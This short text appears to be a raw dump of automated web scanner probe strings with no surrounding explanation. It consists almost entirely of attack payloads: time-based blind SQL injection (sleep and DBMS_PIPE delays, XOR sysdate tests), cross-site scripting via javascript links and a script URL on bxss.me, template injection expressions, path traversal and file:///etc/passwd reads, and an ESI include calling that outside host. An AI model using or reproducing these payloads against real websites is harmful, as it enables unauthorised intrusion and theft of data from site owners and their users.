bxss.me <a HrEF=jaVaScRiPT:> 0) pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98) dfb[[${98991*97996}]]xca 0'XOR(if(now()=sysdate() action.php 0))XOR'Z file:///etc/passwd http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg !(()&&!|*|*| action.php/. HttP://bxss.me/t/xss.html?%00 dfb__${98991*97996}__::.x 0"XOR(if(now()=sysdate() 15)||' 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg ^(#$!@#$)(()))****** bxss.me/t/xss.html?%00 <%={{={@{#{${dfb}}%> "dfbzzzzzzzzbbbccccdddeeexca".replace("z" 0))XOR"Z 1'" "o") (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ ../pHqghUme <th:t="${dfb}#foreach pHqghUme<esi:include src="http://bxss.me/rpb.png"/>
